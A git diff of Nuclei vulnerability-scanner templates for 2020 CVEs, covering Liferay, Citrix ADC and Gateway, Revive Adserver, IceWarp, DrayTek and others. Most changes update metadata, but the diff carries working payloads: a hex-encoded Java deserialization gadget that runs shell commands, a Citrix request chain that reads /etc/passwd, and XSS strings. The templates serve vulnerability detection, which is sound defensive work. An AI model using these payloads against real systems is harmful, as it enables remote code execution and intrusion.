cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D + cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth={{to_lower(rand_text_alpha(5))}}&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D payloads: command: - - "systeminfo" # Windows - - "lsb_release -a" # Linux + - "systeminfo" # Windows + - "lsb_release -a" # Linux matchers-condition: and matchers: - - type: regex - condition: or regex: - "OS Name:.*Microsoft Windows" - "Distributor ID:" + condition: or - type: status status: @@ -52,9 +57,9 @@ http: extractors: - type: regex - part: body regex: - "Microsoft Windows (.*)" - "Distributor ID: (.*)" + part: body -# Enhanced by mp on 2022/04/29 +# digest: 4a0a00473045022100daebab743524ee965b9564263cc2a9f665ec5ab4007e9113ca0b0abbafbfbea60220217de60d6a4b537f3c34c761a3d4d02db0046c94752d1d85bbee31a591552478:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-7980.yaml b/http/cves/2020/CVE-2020-7980.yaml index 87914c45cd..aa61f317fa 100644 --- a/http/cves/2020/CVE-2020-7980.yaml +++ b/http/cves/2020/CVE-2020-7980.yaml @@ -5,6 +5,8 @@ info: author: ritikchaddha severity: critical description: 'Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.' + remediation: | + Upgrade to a patched version of Satellian Intellian Aptus Web (version > 1.24). reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-7980 - https://sku11army.blogspot.com/2020/01/intellian-aptus-web-rce-intellian.html @@ -15,10 +17,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-7980 cwe-id: CWE-78 - cpe: cpe:2.3:a:intelliantech:aptus_web:*:*:*:*:*:*:*:* - epss-score: 0.972 + epss-score: 0.96838 + epss-percentile: 0.99578 + cpe: cpe:2.3:a:intelliantech:aptus_web:1.24:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: intelliantech + product: aptus_web shodan-query: http.title:"Intellian Aptus Web" tags: cve,cve2020,intellian,aptus,packetstorm,satellian,rce @@ -34,6 +39,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: regex @@ -44,4 +50,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/29 +# digest: 4b0a00483046022100b82527587ab7f7119f994a879cc41bc8f25eba7b74e213d2e260f9a40adac26402210081f253716900e92920eb1f01eeb96db16819bceb6207cdb17b190b8e0a33a7fe:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-8115.yaml b/http/cves/2020/CVE-2020-8115.yaml index ce454ad27f..6773125e36 100644 --- a/http/cves/2020/CVE-2020-8115.yaml +++ b/http/cves/2020/CVE-2020-8115.yaml @@ -1,37 +1,44 @@ id: CVE-2020-8115 + info: name: Revive Adserver <=5.0.3 - Cross-Site Scripting author: madrobot,dwisiswant0 severity: medium description: | Revive Adserver 5.0.3 and prior contains a reflected cross-site scripting vulnerability in the publicly accessible afr.php delivery script. In older versions, it is possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script is printed back without proper escaping, allowing an attacker to execute arbitrary JavaScript code on the browser of the victim. + remediation: There are currently no known exploits. As of 3.2.2, the session identifier cannot be accessed as it is stored in an http-only cookie. reference: - https://hackerone.com/reports/775693 - https://www.revive-adserver.com/security/revive-sa-2020-001/ - https://nvd.nist.gov/vuln/detail/CVE-2020-8115 - remediation: There are currently no known exploits. As of 3.2.2, the session identifier cannot be accessed as it is stored in an http-only cookie. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-8115 cwe-id: CWE-79 + epss-score: 0.0187 + epss-percentile: 0.87071 cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* - epss-score: 0.02261 - tags: cve,cve2020,xss,hackerone metadata: max-request: 1 + vendor: revive-adserver + product: revive_adserver + tags: cve,cve2020,xss,hackerone + http: - method: GET path: - "{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\"" + matchers-condition: and matchers: - - type: status - status: - - 200 - type: regex part: body regex: - (?mi)window\.location\.replace\(".*alert\(1337\) -# Enhanced by cs on 2022/09/07 + - type: status + status: + - 200 + +# digest: 4a0a004730450220475e61a28b19582002c91f8f41c6246f0ad372dd7b804e597f5b445b322240fc0221009c99c5ddbbc02f7b9b7808d24b3e19f8ae4de9913b1cd11b3b282e9d5cfba803:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-8163.yaml b/http/cves/2020/CVE-2020-8163.yaml index ca25fd47cb..c7282498fb 100644 --- a/http/cves/2020/CVE-2020-8163.yaml +++ b/http/cves/2020/CVE-2020-8163.yaml @@ -5,8 +5,9 @@ info: author: tim_koopmans severity: high description: Ruby on Rails before version 5.0.1 is susceptible to remote code execution because it passes user parameters as local variables into partials. + remediation: | + Upgrade Ruby on Rails to version 5.0.1 or above. reference: - - https://web.archive.org/web/20201029105442/https://correkt.horse/ruby/2020/08/22/CVE-2020-8163/ - https://hackerone.com/reports/304805 - https://groups.google.com/g/rubyonrails-security/c/hWuKcHyoKh0 - https://lists.debian.org/debian-lts-announce/2020/07/msg00013.html @@ -16,10 +17,14 @@ info: cvss-score: 8.8 cve-id: CVE-2020-8163 cwe-id: CWE-94 - epss-score: 0.97359 - tags: cve,cve2020,rails,rce,hackerone + epss-score: 0.96793 + epss-percentile: 0.99559 + cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: rubyonrails + product: rails + tags: cve,cve2020,rails,rce,hackerone http: - method: GET @@ -28,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex part: body regex: @@ -38,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/28 +# digest: 4b0a0048304602210090a1b24d0d3f74045a839e927b9cb7a2804e05abaa9c6f808c055c70f38757b3022100b8e185ac09c38cce5081db7cb4fef6eeee8fb0640f3f0854c03e1a904e317844:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-8191.yaml b/http/cves/2020/CVE-2020-8191.yaml index 137397c3ee..c6f2fe85de 100644 --- a/http/cves/2020/CVE-2020-8191.yaml +++ b/http/cves/2020/CVE-2020-8191.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 contain a cross-site scripting vulnerability due to improper input validation. + remediation: | + Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability. reference: - https://support.citrix.com/article/CTX276688 - https://nvd.nist.gov/vuln/detail/CVE-2020-8191 @@ -14,10 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-8191 cwe-id: CWE-79 - epss-score: 0.00223 - tags: cve,cve2020,citrix,xss + epss-score: 0.0021 + epss-percentile: 0.58721 + cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: citrix + product: application_delivery_controller_firmware + tags: cve,cve2020,citrix,xss http: - raw: @@ -32,17 +38,17 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body + + - type: word + part: header + words: + - "text/html" - type: status status: - 200 - - type: word - words: - - "text/html" - part: header - -# Enhanced by mp on 2022/09/02 +# digest: 490a00463044022049d254e8ed1d4ef0fba6342d410c97eaa67958bdac05675d206835b96f89da2802203eeb2faf7fe75bf912d82985e212229e323cc667c901fa405224f893a02df7ca:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-8193.yaml b/http/cves/2020/CVE-2020-8193.yaml index 3ec841f79d..f6ed7623bd 100644 --- a/http/cves/2020/CVE-2020-8193.yaml +++ b/http/cves/2020/CVE-2020-8193.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 are vulnerable to local file inclusion because they allow unauthenticated access to certain URL endpoints. + remediation: | + Apply the latest security patches or updates provided by Citrix to fix the local file inclusion vulnerability. reference: - https://github.com/jas502n/CVE-2020-8193 - http://packetstormsecurity.com/files/160047/Citrix-ADC-NetScaler-Local-File-Inclusion.html @@ -14,11 +16,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N cvss-score: 6.5 cve-id: CVE-2020-8193 - cwe-id: CWE-862 - epss-score: 0.97456 - tags: cve,cve2020,citrix,lfi,kev,packetstorm + cwe-id: CWE-287,CWE-284 + epss-score: 0.93748 + epss-percentile: 0.98851 + cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 6 + vendor: citrix + product: application_delivery_controller_firmware + tags: cve,cve2020,citrix,lfi,kev,packetstorm http: - raw: @@ -30,19 +36,15 @@ http: X-NITRO-PASS: xWXHUJ56 - - | GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1 Host: {{Hostname}} - - | GET /menu/neo HTTP/1.1 Host: {{Hostname}} - - | GET /menu/stc HTTP/1.1 Host: {{Hostname}} - - | POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 Host: {{Hostname}} @@ -52,7 +54,6 @@ http: rand_key: {{randkey}} - - | POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1 Host: {{Hostname}} @@ -64,18 +65,18 @@ http: cookie-reuse: true + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + extractors: - type: regex name: randkey # dynamic variable - part: body - internal: true regex: - "(?m)[0-9]{3,10}\\.[0-9]+" - - matchers: - - type: regex - regex: - - "root:.*:0:0:" + internal: true part: body -# Enhanced by mp on 2022/07/22 +# digest: 4a0a0047304502210087df1aff58a263b5d4b9f1231ec1a346ccfdbb917fd97c5fa5f8731d89f7d8d502205119b54943c3046f414c52ad5ab49d7fcf1c59337da59bb34a0686c5edb80649:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-8194.yaml b/http/cves/2020/CVE-2020-8194.yaml index b42f15be5a..cf2d1e4f0c 100644 --- a/http/cves/2020/CVE-2020-8194.yaml +++ b/http/cves/2020/CVE-2020-8194.yaml @@ -4,8 +4,9 @@ info: name: Citrix ADC and Citrix NetScaler Gateway - Remote Code Injection author: dwisiswant0 severity: medium - description: Citrix ADC and NetScaler Gateway are susceptible to remote code injection. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Affected versions are before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18. Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allow modification of a file download. + remediation: | + Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability. reference: - https://support.citrix.com/article/CTX276688 - https://nvd.nist.gov/vuln/detail/CVE-2020-8194 @@ -14,10 +15,14 @@ info: cvss-score: 6.5 cve-id: CVE-2020-8194 cwe-id: CWE-94 - epss-score: 0.97231 - tags: cve,cve2020,citrix + epss-score: 0.90775 + epss-percentile: 0.985 + cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: citrix + product: application_delivery_controller_firmware + tags: cve,cve2020,citrix http: - raw: @@ -29,17 +34,17 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word + part: header words: - "application/x-java-jnlp-file" - part: header - type: status status: - 200 -# Enhanced by md on 2023/04/04 +# digest: 4b0a00483046022100e4274ffc62d77cd2568bc40effe89995402141d584e1be5fba89f8b5179b59e0022100b6ce614c49ac1dcf4a89d065ca794a79e39be502c82a8d720661e9b0841035d4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-8209.yaml b/http/cves/2020/CVE-2020-8209.yaml index 39d85397c7..96adb2e8d2 100644 --- a/http/cves/2020/CVE-2020-8209.yaml +++ b/http/cves/2020/CVE-2020-8209.yaml @@ -10,6 +10,8 @@ info: - https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/ - https://support.citrix.com/article/CTX277457 - https://nvd.nist.gov/vuln/detail/CVE-2020-8209 + remediation: | + Apply the latest security patches or updates provided by Citrix to fix the vulnerability. reference: - https://support.citrix.com/article/CTX277457 classification: @@ -17,11 +19,14 @@ info: cvss-score: 7.5 cve-id: CVE-2020-8209 cwe-id: CWE-22 + epss-score: 0.97075 + epss-percentile: 0.99687 cpe: cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:* - epss-score: 0.97245 - tags: cve,cve2020,citrix,lfi,xenmobile metadata: max-request: 1 + vendor: citrix + product: xenmobile_server + tags: cve,cve2020,citrix,lfi,xenmobile http: - method: GET @@ -30,11 +35,6 @@ http: matchers-condition: and matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - - type: word part: header words: @@ -43,4 +43,9 @@ http: - "attachment;" condition: and -# Enhanced by mp on 2022/06/28 + - type: regex + part: body + regex: + - "root:.*:0:0:" + +# digest: 490a0046304402206aa463d56adeb08783463cae70af70494e7af5a5e1f80c3d6f9a85fa1f5f75670220433c9b24228542f8563ee9d9e099dd2e15c4821f48801c4d5434004569d821da:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-8497.yaml b/http/cves/2020/CVE-2020-8497.yaml index f4629da413..6ea654c60e 100644 --- a/http/cves/2020/CVE-2020-8497.yaml +++ b/http/cves/2020/CVE-2020-8497.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: Artica Pandora FMS through 7.42 is susceptible to arbitrary file read. An attacker can read the chat history, which is in JSON format and contains user names, user IDs, private messages, and timestamps. This can potentially lead to unauthorized data modification and other operations. + remediation: | + Upgrade Artica Pandora FMS to version 7.43 or later to mitigate this vulnerability. reference: - https://k4m1ll0.com/cve-2020-8497.html - https://nvd.nist.gov/vuln/detail/CVE-2020-8497 @@ -13,11 +15,14 @@ info: cvss-score: 5.3 cve-id: CVE-2020-8497 cwe-id: CWE-306 - cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:* epss-score: 0.002 - tags: cve,cve2020,fms,artica + epss-percentile: 0.5761 + cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: artica + product: pandora_fms + tags: cve,cve2020,fms,artica http: - method: GET @@ -39,4 +44,4 @@ http: status: - 200 -# Enhanced by md on 2023/04/04 +# digest: 490a00463044022055c70d093acb2fbffb7c44b3d4a77b9e74c63f1be9a9f2fa2de8df24d7042492022067bd89c8fe1b13b68356361d9879586b396b65c0fa4f76d090a1f87b7c3fabe7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-8512.yaml b/http/cves/2020/CVE-2020-8512.yaml index 2e3278cd43..ee6ea1a297 100644 --- a/http/cves/2020/CVE-2020-8512.yaml +++ b/http/cves/2020/CVE-2020-8512.yaml @@ -5,6 +5,8 @@ info: author: pdteam,dwisiswant0 severity: medium description: IceWarp Webmail Server through 11.4.4.1 contains a cross-site scripting vulnerability in the /webmail/ color parameter. + remediation: | + Upgrade to a patched version of IceWarp WebMail Server (>=11.4.4.2) or apply the vendor-provided patch to mitigate the vulnerability. reference: - https://www.exploit-db.com/exploits/47988 - https://twitter.com/sagaryadav8742/status/1275170967527006208 @@ -16,10 +18,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-8512 cwe-id: CWE-79 + epss-score: 0.01026 + epss-percentile: 0.82173 cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* - epss-score: 0.0046 metadata: max-request: 1 + vendor: icewarp + product: icewarp_server shodan-query: title:"icewarp" tags: edb,packetstorm,cve,cve2020,xss,icewarp @@ -27,18 +32,23 @@ http: - method: GET path: - '{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22' + matchers-condition: and matchers: - type: word + part: body words: - "" - part: body + - "IceWarp" + condition: and + + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 - - type: word - words: - - "text/html" - part: header -# Enhanced by mp on 2022/09/02 +# digest: 4a0a0047304502202137df606f264a013b6d90e8102fe4f9fe1edbac4b34de5ecea44e2b42a42063022100d5a8e913c7504ae92a6f71a729915d2cb2f27cac86fdeac137a05b26211bb8b6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-8515.yaml b/http/cves/2020/CVE-2020-8515.yaml index 25dfd6f503..e7d8efd5e0 100644 --- a/http/cves/2020/CVE-2020-8515.yaml +++ b/http/cves/2020/CVE-2020-8515.yaml @@ -5,21 +5,25 @@ info: author: pikpikcu severity: critical description: DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. + remediation: This issue has been fixed in Vigor3900/2960/300B v1.5.1. reference: - https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515) - https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/ - https://nvd.nist.gov/vuln/detail/CVE-2020-8515 - https://sku11army.blogspot.com/2020/01/draytek-unauthenticated-rce-in-draytek.html - remediation: This issue has been fixed in Vigor3900/2960/300B v1.5.1. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-8515 cwe-id: CWE-78 - epss-score: 0.97183 - tags: cve,cve2020,rce,kev + epss-score: 0.97142 + epss-percentile: 0.99721 + cpe: cpe:2.3:o:draytek:vigor2960_firmware:1.3.1:beta:*:*:*:*:*:* metadata: max-request: 1 + vendor: draytek + product: vigor2960_firmware + tags: cve,cve2020,rce,kev http: - raw: @@ -32,12 +36,12 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: - 200 -# Enhanced by mp on 2022/04/29 +# digest: 490a00463044022003ff34f8b60071dfb971b229a71370346fea40b5e7ccddd21bc7c0c4cf5fdecc022026080374d92eee547795d318b8950f4e7963ececf1faccc65e5b3d78e07baa97:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-8615.yaml b/http/cves/2020/CVE-2020-8615.yaml new file mode 100644 index 0000000000..b9b5a14617 --- /dev/null +++ b/http/cves/2020/CVE-2020-8615.yaml @@ -0,0 +1,63 @@ +id: CVE-2020-8615 + +info: + name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery + author: r3Y3r53 + severity: medium + description: | + A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors). + remediation: update to v.1.5.3 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-8615 + - https://wpscan.com/vulnerability/10058 + - http://packetstormsecurity.com/files/156585/WordPress-Tutor-LMS-1.5.3-Cross-Site-Request-Forgery.html + - https://wpvulndb.com/vulnerabilities/10058 + - https://www.getastra.com/blog/911/plugin-exploit/cross-site-request-forgery-in-tutor-lms-plugin/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N + cvss-score: 6.5 + cve-id: CVE-2020-8615 + cwe-id: CWE-352 + epss-score: 0.00658 + epss-percentile: 0.77229 + cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 2 + vendor: themeum + product: tutor_lms + framework: wordpress + publicwww-query: /wp-content/plugins/tutor/ + tags: wpscan,packetstorm,cve,cve2023,csrf,wp-plugin,wp,tutor,wordpress +variables: + user: "{{rand_base(6)}}" 